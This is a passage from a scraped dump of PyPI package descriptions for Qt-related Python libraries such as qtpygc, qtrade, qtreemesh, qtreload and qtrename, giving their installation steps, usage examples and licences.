QApplication(argv)dialog = CSVImportDialog()dialog.show()app.exec_()```# ExamplesThese can be found in QtPandas/examples.- BasicExmple.py![basic](images/BasicExample_screen_shot.PNG)- Here is TestApp.py![testapp](images/TestApp_screen_shot.PNG)# Development## Wanna contribute?Any feedback is apprecaited.- Report an issue- Check out the wiki for development info (coming soon!)- Fork us.Forked from @datalyze-solutions's [master](https://github.com/datalyze-solutions/pandas-qt).Platform: anyClassifier: Programming Language :: PythonClassifier: Development Status :: 4 - BetaClassifier: Natural Language :: EnglishClassifier: Environment :: X11 Applications :: QtClassifier: Intended Audience :: DevelopersClassifier: License :: OSI Approved :: MIT LicenseClassifier: Operating System :: OS IndependentClassifier: Topic :: Software Development :: Libraries :: Python ModulesClassifier: Topic :: Software Development :: User Interfaces"} +{"package": "qtpip", "pacakge-description": "Qt pipThis project aims to provide a wrapper aroundpip, but handling the Qt\naccount authentication for installing commercial wheels.The expected behavior is to detect thepipcommand from a /hopefully/\nactivated virtual environment, falling back to all the commands, but not for\nthe install.Installpip install qtpipUsageqtpip install pyside6IssuesMajor tasks and discovered use-cases that need to be implemented need to have\na JIRA entry, using theQt pipcomponent.\nYou can open anissue here."} +{"package": "qtpi_short", "pacakge-description": "#short qtpi"} +{"package": "qtpi-test-kernel", "pacakge-description": "_kernelqtpi_test_kernelis an example of a modified Jupyter kernel python wrapper to\nenable inputs written in Qtpi quantum language. This repository complements the\ndocumentation on wrapper kernels here:http://jupyter-client.readthedocs.io/en/latest/wrapperkernels.htmlInstallationUser has to ensure that Python language is installed on the machine.User has to install package manager :pipin case of Python 2 orpip3in case of Python 3.Here are 2 options which depends on the previous installation -To installqtpi_test_kernelfrom PyPI usingPython 2::pip install qtpi_test_kernel\npython -m qtpi_test_kernel.installTo installqtpi_test_kernelfrom PyPI usingPython 3::pip3 install qtpi_test_kernel\npython3 -m qtpi_test_kernel.installUsing the Qtpi kernelNotebook: TheNewmenu in the notebook should show an option for an Qtpi notebook.Console frontends: To use it with the console frontends, add--kernel qtpito\ntheir command line arguments."} +{"package": "qtplot", "pacakge-description": "No description available on PyPI."} +{"package": "qtplotlib", "pacakge-description": "Copyright (c) 2019 J\u00e9r\u00e9mie DECOCK (www.jdhp.org)Web site:http://www.jdhp.org/software_en.html#qtplotlibOnline documentation:http://qtplotlib.readthedocs.orgExamples:http://qtplotlib.readthedocs.org/gallery/Notebooks:https://github.com/jeremiedecock/qtplotlib-python-notebooksSource code:https://github.com/jeremiedecock/qtplotlib-pythonIssue tracker:https://github.com/jeremiedecock/qtplotlib-python/issuesQtPlotLib on PyPI:https://pypi.org/project/qtplotlibQtPlotLib on Anaconda Cloud:https://anaconda.org/jdhp/qtplotlibDescriptionPlotting with Python and QtNote:This project is still in beta stage, so the API is not finalized yet.DependenciesPython >= 3.0InstallationGnu/LinuxYou can install, upgrade, uninstall QtPlotLib with these commands (in a\nterminal):pip install --pre qtplotlib\npip install --upgrade qtplotlib\npip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:python3 setup.py installWindowsYou can install, upgrade, uninstall QtPlotLib with these commands (in acommand prompt):py -m pip install --pre qtplotlib\npy -m pip install --upgrade qtplotlib\npy -m pip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:py setup.py installMacOSXYou can install, upgrade, uninstall QtPlotLib with these commands (in a\nterminal):pip install --pre qtplotlib\npip install --upgrade qtplotlib\npip uninstall qtplotlibOr, if you have downloaded the QtPlotLib source code:python3 setup.py installDocumentationOnline documentation:http://qtplotlib.readthedocs.orgAPI documentation:http://qtplotlib.readthedocs.org/en/latest/api.htmlExample usageTODOBug reportsTo search for bugs or report them, please use the QtPlotLib Bug Tracker at:https://github.com/jeremiedecock/qtplotlib-python/issuesLicenseThis project is provided under the terms and conditions of theMIT License."} +{"package": "qtpyeditor", "pacakge-description": "No description available on PyPI."} +{"package": "qtpygc", "pacakge-description": "qtpygcAre you experiencing strange segfaults in your large multithreaded Qt program at seemingly random times? Maybe even data corruption?It might be because both PyQt and PySide have a longstanding bug that may never be fixed. This bug is the result of three things:Manipulating Qt objects is generallynotthread-safe. The only thread that can safely access a Qt object is the one thatownsthat objects. Deleting an object isespeciallynot safe. Almost all Qt objects are GUI objects and are owned by the GUI thread.Qt objects are generally arranged in a tree and are deleted manually, at least when coding in C++. In Python however, Qt objectscanget garbage-collected when they are no longer referenced. It is easy to create reference cycles, and Python willeventuallycollect such objects when the garbage collector runs.In CPython, garbage collection may run at any timeand from any thread. Typically this happens in threads that allocate and free a lot of objects, which is usually background threads (not the main GUI thread).This means that the garbage collector may run in a background thread and accidentally deallocate a GUI object that is owned by the GUI thread. QObject destruction is not thread-safe, so this results in anything from weird corruption to crashes.This module implements theworkaroundsuggested by Kovid Goyal on the PyQt mailing list: disable automatic garbage collection and periodically run garbage collection manually in the main (Qt GUI) thread.This isnota complete workaround: if you create QObjects in threads other than the GUI thread, you can still get a crash when the GUI thread runs the GC and destroys such objects. You must ensure that objects created in other threads are manually destroyed (for example usingdeleteLater).DependenciesWe try to keep dependencies light:QtPyabstraction layer for PyQt/PySideHeapDictexcellent heap-based priority queue module (88 LoC)To run the tests, you'll needpytest. In particular,tests/test_crash.pychecks that Qt crashes if the workaround in this module isn't active.ExamplesTypical usage would be something like:fromqtpy.QtWidgetsimportQApplicationfromqtpygcimportGarbageCollector# you should only ever create one instance of thisgaco=GarbageCollector()app=QtWidgets.QApplication(sys.argv)# start a timer inside the main Qt thread that collects garbagewithgaco.qt_loop():# run event loop (use app.quit() to exit)app.exec_()If you are running a tight Python loop that creates a lot of cyclic garbage, you can manually trigger a garbage collection if needed:whilesome_condition:do_stuff_that_generates_garbage()# check if the garbage collector should run and signal the GUI thread to run it if necessarygaco.maybe_collect_threadsafe()Alternatively, you can temporarily decrease the GC timer interval:# while inside the \"with\" block, check if the GC needs to be run every hundredth of a secondwithgaco.gc_interval_threadsafe(0.01):do_stuff_that_generates_a_lot_of_garbage()"} +{"package": "qtpygraph", "pacakge-description": "A pythonic interface to theQtGraphics View Framework usingqtpy."} +{"package": "qtpyinheritance", "pacakge-description": "Prototype qtpy inheritance-related tools"} +{"package": "qtpy-led", "pacakge-description": "qtpy_ledSimple LED widget for QtPy.Forked frompyqt_ledby Neur1n and modified to work with QtPy.Table of ContentsInstallationUsageTipsLicenseInstallationpip$ pip install qtpy-ledpoetry$ poetry installUsageThe following example is also provided in the package, and will result in the screenshots shown above.fromqtpy.QtCoreimportQtfromqtpy.QtWidgetsimportQApplicationfromqtpy.QtWidgetsimportQGridLayoutfromqtpy.QtWidgetsimportQWidgetfromqtpy_ledimportLedimportnumpyasnpimportsysclassDemo(QWidget):def__init__(self,parent=None):QWidget.__init__(self,parent)self._shape=np.array([\"capsule\",\"circle\",\"rectangle\"])self._color=np.array([\"blue\",\"green\",\"orange\",\"purple\",\"red\",\"yellow\"])self._layout=QGridLayout(self)self._create_leds()self._arrange_leds()defkeyPressEvent(self,e):ife.key()==Qt.Key_Escape:self.close()def_create_leds(self):forsinself._shape:forcinself._color:exec('self._{}_{}= Led(self, on_color=Led.{},\\shape=Led.{}, build=\"debug\")'.format(s,c,c,s))exec(\"self._{}_{}.setFocusPolicy(Qt.NoFocus)\".format(s,c))def_arrange_leds(self):forrinrange(3):forcinrange(6):exec(\"self._layout.addWidget(self._{}_{},{},{}, 1, 1,\\Qt.AlignCenter)\".format(self._shape[r],self._color[c],r,c))c+=1r+=1app=QApplication(sys.argv)# type: ignoredemo=Demo()demo.show()sys.exit(app.exec_())TipsIf you want to be able to toggle the LED, then either usesetEnable(True)or pass an empty string to thebuildargument in Led.Thestatus_changedsignal will emit a boolean when the LED's state has changed.Currently, the only way to shrink the LED beyond the default size is to usesetFixedSizeLicenseMIT License. Copyright (c) 2023 crash8229."} +{"package": "qtpynodeeditor", "pacakge-description": "qtpynodeeditorPython Qt node editorPure Python port ofNodeEditor,\nsupporting PyQt5 and PySide throughqtpy.RequirementsPython 3.6+qtpyPyQt5 / PySideDocumentationSphinx-generated documentationScreenshotsStyle exampleCalculator exampleInstallationWe recommend using conda to install qtpynodeeditor.$ conda create -n my_new_environment -c conda-forge python=3.7 qtpynodeeditor\n$ conda activate my_new_environmentqtpynodeeditor may also be installed using pip from PyPI.$ python -m pip install qtpynodeeditor pyqt5Running the TestsTests must be run with pytest and pytest-qt.$ pip install -r dev-requirements.txt\n$ pytest -v qtpynodeeditor/tests"} +{"package": "qtpyt", "pacakge-description": "# pyqtA quantum transport library based on the non equilibrium Green\u2019s function (NEGF) formalism written in Python.## Getting StartedThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.### Prerequisites> Asehttps://wiki.fysik.dtu.dk/ase/> numpyhttps://github.com/numpy### Installingpip install qtpyt## Running the testspytest subfolder/tests### Upload# change version number.twine upload \u2013repository testpypi dist/qtpyt-0.0.tar.gz### Registerpython setup.py sdist### Build Cythonpython setup.py build_ext \u2013inplace### Install developpip install -e ."} +{"package": "qtpyvcp", "pacakge-description": "QtPyVCP - QtPy Virtual Control PanelQtPyVCP is a Qt and Python based framework for building virtual control panels\nfor the LinuxCNC machine control.The goal is to provide a no-code, drag-and-drop system for making simple VCPs,\nas well as a straightforward, flexible and extensible framework to aid in\nbuilding complex VCPs.Installation and UsageSee thedocumentation.DevelopmentGitHub RepoIssue TrackerDocumentation and HelpDocumentationLinuxCNC ForumFreenode IRC(#hazzy) (Issues joining? please try other network)The Matrix(#qtpyvcp:matrix.org)Gitter(Issues joining? please try other network)DiscordDependanciesLinuxCNC 2.8^ or masterPython 2.7PyQt5 or PySide2QtPyVCP is developed and tested using the LinuxCNC Debian 9 and 10 x64 (stretch and buster)Live ISO. It should run\non any system that can have PyQt5 installed, but Debian 9 and 10 x64 is the only OS\nthat is officially supported.DISCLAIMERTHE AUTHORS OF THIS SOFTWARE ACCEPT ABSOLUTELY NO LIABILITY FOR\nANY HARM OR LOSS RESULTING FROM ITS USE. IT ISEXTREMELYUNWISE\nTO RELY ON SOFTWARE ALONE FOR SAFETY. Any machinery capable of\nharming persons must have provisions for completely removing power\nfrom all motors, etc, before persons enter any danger area. All\nmachinery must be designed to comply with local and national safety\ncodes, and the authors of this software can not, and do not, take\nany responsibility for such compliance.This software is released under the GPLv2."} +{"package": "qt-qtemplate", "pacakge-description": "# Python QTemplate\nSimple but powerful QT template language for PySide6."} +{"package": "qtrace", "pacakge-description": "No description available on PyPI."} +{"package": "qtrade", "pacakge-description": "QtradeThis is a very basic Python 3.8+ wrapper for theQuestrade API, a Canadian low cost broker.InstallationThis package is available viaPyPIand can be installed via the commandpip install qtradeUsageFor an overview of the package API, please take a look at thedocs. The main class of the package is calledQuestradeand houses most of the functionality provided by the package. Below are a few examples for possible use cases.Token managementThe central class can be initialized viafromqtradeimportQuestradeqtrade=Questrade(access_code='')whereis the token that one gets from the Questrade API portal. It is calledaccess_codesince this initial token is used to get the full token data that will include{'access_token':,'api_server':'','expires_in':1234,'refresh_token':,'token_type':'Bearer'}The first call initializes the class and the second call gets the full token.Another way to initialize the class is to use a token yaml-file via:qtrade=Questrade(token_yaml='')where the yaml-file would have the general formaccess_token:api_server:expires_in:1234refresh_token:token_type:BearerIf the token is expired, one can useqtrade.refresh_access_token(from_yaml=True)to refresh the access token using the saved refresh token.Once the tokens are set correctly, I have currently added methods to get ticker quotes, the\ncurrent status of all positions in any Questrade account that is associated with the tokens,\nany account activities such as trades and dividend payments as well as historical data for\ntickers that are supported by Questrade.Basic functionalityThere currently exists some basic functionality to get stock information viaaapl,amzn=qtrade.ticker_information(['AAPL','AMZN'])and current stock quotes can be obtained viaaapl,amzn=qtrade.get_quote(['AAPL','AMZN'])In addition, one can get historical stock quotes viaaapl_history=qtrade.get_historical_data('AAPL','2018-08-01','2018-08-21','OneHour')Here, the last input parameter is the interval between quotes. Another option could be'OneDay'. For more options, see theQuestrade API description.Account informationIn addition, the Questrade API gives access to account information about the accounts connected to\nthe token. The accounts IDs can be accessed viaaccount_ids=qtrade.get_account_id()By using the correct account ID, one can get the positions of the accounts viapositions=qtrade.get_account_positions(account_id=123456)Finally, there exists a method to get all account activities (trades, dividends received, etc.) of\nan account in a certain time frame viaactivities=qtrade.get_account_activities(123456,'2018-08-01','2018-08-16')ContributorsContributions are always appreciated! For example:open an issue for a missing feature or a buggive feedback about existing functionalitymake suggestions for improvementssubmit a PR with a new feature (though reaching out would be appreciated)etc.There is a test suite that can be run viapython -m pytest. This project usespre-commitandblack,flake8andisortwhich takes care of automatic code formatting and linting. When setting up the development\nenvironment, runpre-commit installto set up the hook. This will run all the linting automatically when\ncommitting code changes.DisclaimerI am in no way affiliated with Questrade and using this API wrapper is licensed via the MIT license."} +{"package": "qtrader", "pacakge-description": "QTrader: A Light Event-Driven Algorithmic Trading EngineLatest update on 2022-07-20QTrader is a light and flexible event-driven algorithmic trading engine that\ncan be used to backtest strategies, and seamlessly switch to live trading\nwithout any pain.Key FeaturesCompletelysame codefor backtesting / simulation / live tradingSupport trading of various assets: equity, futuresResourceful functionalities to support live monitoring and analysisQuick InstallYou may run the folllowing command to install QTrader immediately:# Virtual environment is recommended (python 3.8 or above is supported)>>condacreate-nqtraderpython=3.8>>condaactivateqtrader# Install stable version from pip (currently version 0.0.2)>>pipinstallqtrader# Alternatively, install latest version from github>>pipinstallgit+https://github.com/josephchenhk/qtrader@masterPrepare the DataQTrader supports bar data at the moment. What you need to do is creating a\nfolder with the name of the security you are interested in. Let's say you want\nto backtest or trade HK equity\"HK.01157\"in frequency of1 minute, your\ndata folder should be like this (where \"K_1M\" stands for 1 minute; you can also\nfind a sample from the qtrader/examples/data):And you can prepare OHLCV data in CSV format, with dates as their file names,\ne.g.,\"yyyy-mm-dd.csv\":Inside each csv file, the data columns should look like this:Now you can specify the path of data folder inqtrader/config/config.py. For\nexample, setDATA_PATH={\"kline\":\"path_to_your_qtrader_folder/examples/data/k_line\",}Implement a StrategyTo implement a strategy is simple in QTrader. A strategy needs to implementinit_strategyandon_barmethods inBaseStrategy. Here is a quick sample:fromqtrader.core.strategyimportBaseStrategyclassMyStrategy(BaseStrategy):definit_strategy(self):passdefon_bar(self,cur_data:Dict[str,Dict[Security,Bar]]):print(cur_data)Record VariablesQTrader provides a module namedBarEventEngineRecorderto record variables\nduring backtesting and/or trading. By default it savesdatetime,portfolio_valueandactionat every time step.If you want to record additional variables (let's say it is calledvar), you\nneed to write a method calledget_varin your strategy:fromqtrader.core.strategyimportBaseStrategyclassMyStrategy(BaseStrategy):defget_var(self):returnvarAnd initialize yourBarEventEngineRecorderwith the same vairablevar=[](if\nyou want to record every timestep) orvar=None(if you want to record only the\nlast updated value):recorder=BarEventEngineRecorder(var=[])Run a BacktestNow we are ready to run a backtest. Here is a sample of running a backtest in\nQTrader:# Securitystock_list=[Stock(code=\"HK.01157\",lot_size=100,security_name=\"\u4e2d\u8054\u91cd\u79d1\",exchange=Exchange.SEHK),]# Gatewaygateway_name=\"Backtest\"gateway=BacktestGateway(securities=stock_list,start=datetime(2021,3,15,9,30,0,0),end=datetime(2021,3,17,16,0,0,0),gateway_name=gateway_name,)gateway.SHORT_INTEREST_RATE=0.0gateway.set_trade_mode(TradeMode.BACKTEST)# Core engineengine=Engine(gateways={gateway_name:gateway})# Strategy initializationinit_capital=100000strategy_account=\"DemoStrategy\"strategy_version=\"1.0\"strategy=DemoStrategy(securities={gateway_name:stock_list},strategy_account=strategy_account,strategy_version=strategy_version,init_strategy_cash={gateway_name:init_capital},engine=engine,strategy_trading_sessions={\"HK.01157\":[[datetime(1970,1,1,9,30,0),datetime(1970,1,1,12,0,0)],[datetime(1970,1,1,13,0,0),datetime(1970,1,1,16,0,0)],],)strategy.init_strategy()# Recorderrecorder=BarEventEngineRecorder()# Event engineevent_engine=BarEventEngine({\"demo\":strategy},{\"demo\":recorder},engine)# Start event engineevent_engine.run()# Program terminates normallyengine.log.info(\"Program shutdown normally.\")After shutdown, you will be able to find the results in qtrader/results, with\nthe folder name of latest time stamp:The result.csv file saves everything you want to record inBarEventEngineRecorder; while pnl.html is an interactive plot of the equity\ncurve of your running strategy:Simulation / Live tradingOk, your strategy looks good now. How can you put it to paper trading and/or\nlive trading? In QTrader it is extremely easy to switch from backtest mode to\nsimulation or live trading mode. What you need to modify is justtwolines (replace a backtest gateway with a live trading gateway!):# Currently you can use \"Futu\", \"Ib\", and \"Cqg\"gateway_name=\"Futu\"# Use FutuGateway, IbGateway, or CqgGateway accordingly# End time should be set to a future time stamp when you expect the program terminatesgateway=FutuGateway(securities=stock_list,end=datetime(2022,12,31,16,0,0,0),gateway_name=gateway_name,)# Choose either TradeMode.SIMULATE or TradeMode.LIVETRADEgateway.set_trade_mode(TradeMode.LIVETRADE)That's it! You switch from backtest to simulation / live trading mode now.Important Notice: In the demo sample, the live trading mode will keep on\nsending orders, please be aware of the risk when running it.Live MonitoringWhen running the strategies, the trader typically needs to monitor the market\nand see whether the signals are triggered as expected. QTrader provides with\nsuchdashboard(visualization panel) which can dynamically update the market data and gives\nout entry and exit signals in line with the strategies.You can activate this function in yourconfig.py:ACTIVATED_PLUGINS=[..,\"monitor\"]After running the main script, you\nwill be able to open a web-based monitor in the browser:127.0.0.1:8050:QTrader is also equipped with aTelegram Bot, which allows you get instant\ninformation from your trading program. To enable this function, you can add your\ntelegram information inqtrader.config.config.py(you can refer to the\nfollowinglinkfor detailed guidance):ACTIVATED_PLUGINS=[..,\"telegram\"]TELEGRAM_TOKEN=\"50XXXXXX16:AAGan6nFgmrSOx9vJipwmXXXXXXXXXXXM3E\"TELEGRAM_CHAT_ID=21XXXXXX49In this way, your mobile phone with telegram will automatically receive a\ndocumenting message\uff1aYou can use your mobile phone to monitor and control your strategy now.ContributingFork it (https://github.com/josephchenhk/qtrader/fork)Study how it's implemented.Create your feature branch (git checkout -b my-new-feature).Useflake8to ensure your code format\ncomplies with PEP8.Commit your changes (git commit -am 'Add some feature').Push to the branch (git push origin my-new-feature).Create a new Pull Request."} +{"package": "qtradingview", "pacakge-description": "QTradingViewPyQt App for TradingView.Recommends simple login to autosave your draws.IndexFeaturesInstallationUsageFeaturesIncludes the most cryptocurrencies exchanges available in tradingview.Complete lists of available markets, with symbol filter.Favorite and margin lists.Portfolio.Ads remove.InstallationQTradingView needs an environment with Python3 and Qt5Prepare environmentInstallAnacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5conda install -c anaconda pyqtQTradingView from source codepip install poetry\n git clone https://github.com/katmai1/qtradingview\n cd qtradingviewUsageInstall PyQt5 libs using anacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5 and dependenciesconda install -c anaconda pyqtinstallpip install qtradingviewRunning from source using AnacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5 and dependenciesconda install -c anaconda pyqt\npip install -r requirements.txtRunpython apprun.py*Can be install without Anaconda if install all PyQt5 dependencies manually.TroubleshotDatabase issues after an updateProbably the last update does changes into database and this changes are not applied automatically. You can try update tables manually.- If running from source:\n python apprun.py --updatedb\n\n- If running compiled release:\n qtradingview --updatedb\n\n* This function works fine whe running from source code, with a compiled version sometimes not update correctly.If issue persist you can delete database to force his create again.- If running from source:\n python apprun.py --deletedb\n\n- If running compiled release:\n qtradingview --deletedb"} +{"package": "qt-range-slider", "pacakge-description": "qt-range-sliderDemo"} +{"package": "q-transformer", "pacakge-description": "No description available on PyPI."} +{"package": "qtreactor", "pacakge-description": "No description available on PyPI."} +{"package": "qt-reactor", "pacakge-description": "QReactorForked from qt5reactor which was forked from qt4reactor and now uses\n[qtpy](https://github.com/spyder-ide/qtpy) to provide to support both.Using the QtReactorInstall using pippip install qt-reactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qreactor\nqreactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] [twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.Testing on Python 3trialdoes not work on Python3 yet. Use Twisted\u2019sPython 3 test runnerinstead.Install the reactor before callingunittest.main().import qreactor\nqreactor.install()\nunittest.main(...)"} +{"package": "qtree", "pacakge-description": "No description available on PyPI."} +{"package": "qtreemesh", "pacakge-description": "QTREEMESHGeneration of QuadTree mesh from an imageExplore the docs \u00bbView Demo\u00b7Report Bug\u00b7Request FeatureTable of ContentsAbout The ProjectGetting StartedInstallationUsageRead ImagePreprocessingQuadTree AlgorithmMesh GenerationExport and ImplementationTheoretical ExplanationRoadmapContributingLicenseContactAcknowledgmentsAbout The ProjectQTREEMESH is a python package that can create aQuadtreestructure from an image. This tree data structure can also be converted to mesh structure that can be used in different areas of science, e.g. finite element analysis. The Quadtree algorithm in this package is based on pixels' intensity. For more information about this algorithm, please refer toTheoretical Explanationsection of this doc.(back to top)Getting StartedThis part explains how to install and use this package.InstallationInstallQTREEMESHfrom PyPI via pip.pipinstallqtreemesh(back to top)UsageThere is atest.pyfile inexamplesfolder that demonstrate how different parts of this package work. Here we go through this file line by line:1. Read ImageFirst we import required tools from other librariesfromPILimportImage# to read image file properlyfromnumpyimportasarray# for converting image matrix to arrayThen we read the image and convert it to gray-scale. There are three example images inexamplesfolder.4.jpgis smaller than the two others and need fewer computation efforts.im=Image.open(\"4.jpg\").convert('L')2. PreprocessingThe quadtree algorithm is most efficient when the image is square and the number of its pixels is an integer power of 2, i.e. $2^n$. There is a functionimage_preprocess()dedicated to the modification of the original image by padding it with zero intensity pixels and satisfying the mentioned requirement:fromqtreemeshimportimage_preprocessimar=image_preprocess(asarray(im))3. QuadTree AlgorithmThe QuadTree decomposition can be performed onimage_arrayusing a recursive classQTreebased on giventolerance.fromqtreemeshimportQTreequad=QTree(None,imar,125)# QTree(None, image_array, tolerance)QTreeobject may have 4 childrenQTreeobjects (can be accessed through attributes:north_west,north_east,south_west,south_east) and so on. EachQTreehas an attributedividedthat determines the existence of children partitions. There are also an property method for countingcount_leavesand a method for saving tree leavessave_leaves(i.e. undivided partitions).4. Mesh GenerationCommon mesh data structure can be extracted from QuadTree structure usingQTreeMeshclass. After initiating the class, correspondingelementsandnodescan be generated as attributes of theQTreeMeshobject with the methodcreate_elements. The resulted mesh may be illustrated usingdrawmethod.fromqtreemeshimportQTreeMeshmesh=QTreeMesh(quad)mesh.create_elements()mesh.draw(True,'orangered')# mesh.draw(fill_inside, edge_color, save_name)Each element inelementsis aQTreeElementobject that contains many attributes, e.g. element number :number, element nodes :nodes_numbers, element property (average of pixel intensities) :element_propertyand etc.ExampleImageMesh4.jpg5.jpgFor more examples, please refer to theDocumentation5. Export and ImplementationOne can easily export generated mesh asvtkformat using following line:mesh.vtk_export(filename=\"4_meshed.vtk\")and the result can be viewed in visualization applications such asParaView:It's worth mentioning that the methodvtk_export()has no dependency to vtk related libraries and create.vtkfile manually.It is also possible to adjust the elements to handle hanging nodes and generate a mesh that is either triangular or quadrilateral/triangular (based on templates available in [2] and [3]).:fem_nodes,fem_elements,fem_properties=mesh.adjust_mesh_for_FEM()The default configuration generates FEM elements as triangles. To include both quadrilateral and triangle elements, setforce_triagulationtoFalse.(back to top)Theoretical ExplanationIntroductionAQuadtreeis a special type of tree where each parent node has exactly four smaller nodes connected to it. Each square in the Quadtree is represented by a node. If a node has children, their squares are the four quadrants of its own square, which is why the tree is called a tree. This means that when you put the smaller squares of the leaves together, they make up the bigger square of the root.In this figure, labelsNW,NE,SE, andSWare representing different quadrants (North-West, North-East, South-East and South-West respectively).While this algorithm has many applications in various fields of science (e.g., collision detection, image compression, etc.), this doc especially focuses on the mesh generation subject. There almost three major definition of problem:Points set problems:In this case, there are a set of points ${p_i} : (x_i , y_i)$ (which can be interpreted as the position of objects), and we need to build the quadtree in such a way that every square contains at most $c$ point(s). First we consider the root square which contains all the points. Then we start recursively splitting squares until the criteria $n_p \\le c$ met. In following figure, the quadtree of 11 points with $c = 1$ is illustrated:There are many different implementations of this variation of algorithm, for example inPython,C++, andC#.Domain boundary problems:This type of problem is very common in mesh generation for CAD models. The domain of interest is defined by some lines that usually separate inside of the domain from outside of it. A common approach is to generateseed pointson the boundary and create a quadtree just the same as points set problems. There will be some additional steps to convert quadtree to FEM mesh, such as removing the outside squares and trimming of boundary squares. The following figure illustrate quadtree ofa circular domain.Digital images problems:The quadtree decomposition of an image means dividing the image into squares with the same color (within a given threshold). Considering an image consisting of $2^n \u00d7 2^n$ pixels, the algorithm recursively split the image into four quadrants until the difference between the maximum and minimum pixels intensities becomes less than the specified tolerance.The current package is dedicated to these types of problems.Referencesde Berg, M., Cheong, O., van Kreveld, M., & Overmars, M. (2008). Computational geometry: Algorithms and applications. In Computational Geometry: Algorithms and Applications. Springer Berlin Heidelberg.https://doi.org/10.1007/978-3-540-77974-2Lo, D.S.H. (2015). Finite Element Mesh Generation (1st ed.). CRC Press.https://doi.org/10.1201/b17713George, P. L. (1992). Automatic mesh generation and finite element method. Wiley.https://doi.org/10.1016/S1570-8659(96)80003-2RoadmapCompleting the codes documentationAdding details to README fileExporting data asvtkformatSuccessfully implement in FEM softwareHandling hanging nodesPrepare required dataIllustrate usage in open-source FEM programsPrepare required data for SBFEMSee theopen issuesfor a full list of proposed features (and known issues).(back to top)ContributingContributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make aregreatly appreciated.If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag \"enhancement\".\nDon't forget to give the project a star! Thanks again!(back to top)LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.(back to top)ContactSadjad Abedi -AbediSadjad@gmail.comProject Link:https://github.com/Sad-Abd/qtreemesh(back to top)Acknowledgments(back to top)"} +{"package": "qtregpy", "pacakge-description": "qtregpyThis package provides the software tools to implement Quantile Transformation Regression introduced inSpady and Stouli (2020).With the tools in this package it is possible to obtain inference and estimation results for conditional distribution,\nquantile and density functions implied by flexible Gaussian representations.For further details, please refer to the original text.InstallationYou can install gtregpy with pip directly from PyPI.pip install qtregpyUsageHere's a simple example of how to use gtregpy:importqtregpyasqtrmel_data_path='filepath/melbeourne.csv'x,y=qtr.load_mel_data(mel_data_path)mel_answer=qtr.compute_basic(x,y)DocumentationYou can find more detailed documentation for each function in docstrings.TestingTo run the tests, use the following command:pytesttests/ContributingWe welcome contributions! Please see theContribution Guidefile for details on how to contribute.LicenseThis package is licensed under the MIT license. See the LICENSE file for details."} +{"package": "qtreload", "pacakge-description": "qtreloadQt utilities to enable hot-reloading of python/Qt codeHave you been using Jupyter Notebook's magic functions such as%load_ext autoreload\n%autoreload 2where you might have been editing code in VSCode or Pycharm and executing actions in Jupyter Notebook?Or have you previously usedLiClipsewhich hasDebugger Auto-Reload?Well,qtreloadprovides similar capabilities by 'hot-reloading' python modules when there are changes to\nthe source code. It operates by generating a list of all possible modules/submodules for a specific project and\nthen usingQFileWatcherto observe any changes to these files.This library should be used when developing Qt code in Python and you are not interested in continually having to restart your application. (See limitations to find out when its still required).UsageYou can instantiate theQtReloadWidgetmanually or using theinstall_hot_reloadfunction.Note! Make sure to instantiate QApplication before running this code.UsingQtReloadWidget:from qtreload.qt_reload import QtReloadWidget\n\n# you can specify list of modules that should be monitored\nlist_of_widgets = [\"napari\", \"spyder\", \"...\"]\n\nwidget = QtReloadWidget(list_of_modules)That's pretty much it. Now every time you make changes to your source code in e.g.napariwill be reflected in your interpreter.Usinginstall_hot_reloadrequires two environment variabels being set, namely:QTRELOAD_HOT_RELOAD=1\nQTRELOAD_HOT_RELOAD_MODULES=\"napari, spyder\"Then you can just execute the following:from qtreload.install import install_hot_reload\n\ninstall_hot_reload()When it works like magicThere are countless examples where this approach really well. Some examples:You are running your application where you have methodon_runbut when you execute this function, you notice that you misspelled some variable. In normal circumstances you would need to restart the application. Now, however, you can correct it in your IDE, save, and try running again.You are running your application and are modifying the layout of a popup window. Now you can do this and each time the dialog is reshown, the new version of the dialog will be shown.LimitationsWhile this approach can be extremely useful and can save a lot of time, it has a couple of limitations:code within the___init__.pycannot be reloadedsome changes to GUI code cannot be reloaded - if e.g. you are modying theQMainWindowand just added a new button, this button will now be shown. In order to show it, you will still need to restart the application. If, however, you were modyfing a plugin or a dialog that is shown upon clicking on e.g. menu item, these changes WILL take place.modifying python properties (@setter/@getter) is not always reloadedAcknowledgementsThe hot-reload code is directly copied from the PyDev debugger developed byfabiozwith minimal changes to remove any dependenciesSeehttps://github.com/fabioz/PyDev.Debugger/blob/main/_pydevd_bundle/pydevd_reload.py"} +{"package": "qtrename", "pacakge-description": "QtRenamefeature-rich app to rename files for GNU/Linux and WindowsInstallationDescriptionLicenseFeaturesReport a bug - Request featureScreenshotsChangelogInstallationLinux:pip install qtrenameTo avoid running the app from the command line, you need to add it to your apps menu:Download thisscriptOpen the terminal andcdto the location ofsetup.shrun:chmod u+x setup.shrun:./setup.shHead to your apps menu, type qtfind or you can find it under Accessories.Windows:Download the installer fromhere[RequireMicrosoft Visual C++ 2015 Redistributable]Description:heavy_check_mark:QtRenameis a graphical interface for bulk renaming.:heavy_check_mark:QtRenameeasy to use.:heavy_check_mark:QtRenameis for for Linux and Windows.:heavy_check_mark:QtRenameis made with PyQt5LicenseThis program comes with absolutely no warranty. See theGNU General Public Licence, version 3 or later for details.FeaturesFind and Replace:Skip the firstNoccurrencesReplace maxNoccurrencesCase sensitiveSwap chunks of charactersfind occurrences using RegExCasing:Change case file, extension or both (upper, lower, sentence, title, invert, random)Ignore upper and/or mixed caseAdd/RemoveInsert/Overwrite/Remove characters at a specific position (backwards option available)Combine Insert/Overwrite/RemoveMovecharacters from onne position to another (absolute/relative position, backwards,)Spaces:Remove leading/trailing/multiple 